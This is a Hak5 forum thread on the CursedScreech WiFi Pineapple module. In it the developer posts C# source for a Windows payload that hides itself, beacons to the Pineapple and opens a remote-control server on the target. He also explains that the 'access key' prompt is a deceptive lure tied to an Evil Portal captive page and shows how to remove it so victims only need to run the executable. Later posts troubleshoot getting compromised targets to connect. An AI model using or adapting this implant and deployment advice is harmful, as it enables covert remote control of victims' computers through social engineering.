Jump to content
Hak5 Forums
sud0nick

[Official] CursedScreech

Recommended Posts

On 7/11/2018 at 6:11 PM, Ramez said:

I was finally able to find the solution! Apart from everything else I did above, you need to add the 'targetlogs' folder to the follow directory: /pineapple/modules/CursedScreech/includes/forest

It looks like for some reason the new firmware updates have been causing issues where the 2 folders (keys & targetlogs) do not get created automatically. Anyway, hope this helps!

@Ramez thanks for finding this.  I just verified that the targetlogs directory doesn't get created as it should.  I'll work on a fix and push the update.  I'll also look into the keys directory in PortalAuth as I'm sure it's related to the same issue.

Share this post


Link to post
Share on other sites
1 hour ago, sud0nick said:

@Ramez thanks for finding this.  I just verified that the targetlogs directory doesn't get created as it should.  I'll work on a fix and push the update.  I'll also look into the keys directory in PortalAuth as I'm sure it's related to the same issue.

I think that's my bad. I just realized that when we switched all modules from .tar.gz format to the git repository, empty directories would disappear.

They'll need to be created programatically instead.

Share this post


Link to post
Share on other sites
1 hour ago, Sebkinne said:

I think that's my bad. I just realized that when we switched all modules from .tar.gz format to the git repository, empty directories would disappear.

They'll need to be created programatically instead.

Yeah, it's my fault for not checking for their existence in the first place.

Share this post


Link to post
Share on other sites

You could also add a .gitkeep file to the directories as a placeholder so git doesn't remove them.

Share this post


Link to post
Share on other sites

I really appreciate the payload you have provided with the cursedscreech module, but I was just wondering, are there any other payloads out there that don't involve having to put it in an access key? In other words, the victim just has to download the executable file and run it, instead of having to do the whole generate access key thing. I've looked everywhere but can't seem to find any pre-configured payloads for the pineapple.

Share this post


Link to post
Share on other sites

@Ramez when you generate the payload in Visual Studio just don't include the PA_Authorization class.  Here's an example:

using System;
using System.Drawing;
using System.Windows.Forms;
using PineappleModules;

namespace Payload
{
	public partial class Form1 : Form {
    
      	// ***************** REMOVE THIS LINE *****************
		PA_Authorization pauth = new PA_Authorization();
      	// ***************** REMOVE THIS LINE *****************
	
		public Form1() {
			InitializeComponent();
	
			CursedScreech cs = new CursedScreech();
			cs.startMulticaster("231.253.78.29", 19578);
			cs.setRemoteCertificateSerial("EF-BE-AD-DE");
			cs.setRemoteCertificateHash("1234567890ABCDEF");
			cs.startSecureServerThread("Payload.Payload.pfx", "#$My$ecuR3P4ssw*rd&");
		}
		private void Form1_FormClosing(object sender, FormClosingEventArgs e) {
			e.Cancel = true;
			this.Hide();
		}
      
      // ***************** REMOVE THIS FUNCTION *****************
      
		private void accessKeyButton_Click(object sender, EventArgs e) {
				
			// Request an access key from the Pineapple
			string key = pauth.getAccessKey();
	
			// Check if a key was returned
			string msg;
			if (key.Length > 0) {
				msg = "Your access key is unique to you so DO NOT give it away!\n\nAccess Key: " + key;
			}
			else {
				msg = "Failed to retrieve an access key from the server.  Please try again later.";
			}
			
			// Display message to the user
			MessageBox.Show(msg);
		}
      
      // ***************** REMOVE THIS FUNCTION *****************
	}
}

The authorization function is just a trick anyway.  There's no real dependency on the access key for Cursed Screech.  However, the Payloader injection set in Portal Auth does require the access key to allow a target through Evil Portal.  Maybe in the future I'll add a Payloader injection set that doesn't require the access key but for now you'll have to remove that functionality yourself.

Share this post


Link to post
Share on other sites

first of all, thank you for the amazing support you have been giving. i do have a quick question. My target downloads and runs the payload fine, but although it shows up in de serverlog, Sein cant seem to make a connection. It never turns up in the target list in CursedScreech. does anyone have any idea's why??

Share this post


Link to post
Share on other sites
11 hours ago, display-names said:

first of all, thank you for the amazing support you have been giving. i do have a quick question. My target downloads and runs the payload fine, but although it shows up in de serverlog, Sein cant seem to make a connection. It never turns up in the target list in CursedScreech. does anyone have any idea's why??

How is your target connected to the Pineapple?  There's an interface setting in the Settings pane that lets you select which interface Sein should listen on.  Make sure it's listening on the one that's connected to the same network as your target.

Share this post


Link to post
Share on other sites
11 hours ago, sud0nick said:

How is your target connected to the Pineapple?  There's an interface setting in the Settings pane that lets you select which interface Sein should listen on.  Make sure it's listening on the one that's connected to the same network as your target.

Sein is listening on the br-lan interface, the target is connected through the open PineAP AP. Does that make sense?

Share this post


Link to post
Share on other sites
16 hours ago, display-names said:

Sein is listening on the br-lan interface, the target is connected through the open PineAP AP. Does that make sense?

The PineAP interface is wlan1.  Not sure if you should see it on br-lan or not but try switching Sein to wlan1 and see if it works.

Share this post


Link to post
Share on other sites
Posted (edited)
7 hours ago, sud0nick said:

The PineAP interface is wlan1.  Not sure if you should see it on br-lan or not but try switching Sein to wlan1 and see if it works.

Well, i only have the option to set it to br-lan, i do have the most up to date version though. i will just try to reinstall the module i guess. but just in case, any idea's why i cant set my Sein interface to anything except br-lan?

 

EDIT 1: reinstall didnt help, too bad

Sein.png

Edited by display-names

Share this post


Link to post
Share on other sites

Nevermind, wlan1 isn't available because by default it doesn't have an IP address.  The only interfaces that appear in that dropdown are those that have an IP.  br-lan should definitely be working.  I'll look into it.

Share this post


Link to post
Share on other sites
On 8/9/2018 at 2:58 AM, sud0nick said:

Nevermind, wlan1 isn't available because by default it doesn't have an IP address.  The only interfaces that appear in that dropdown are those that have an IP.  br-lan should definitely be working.  I'll look into it.

hey there, i have tried to get it to work, but no luck, did you have any more luck?:)

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.

×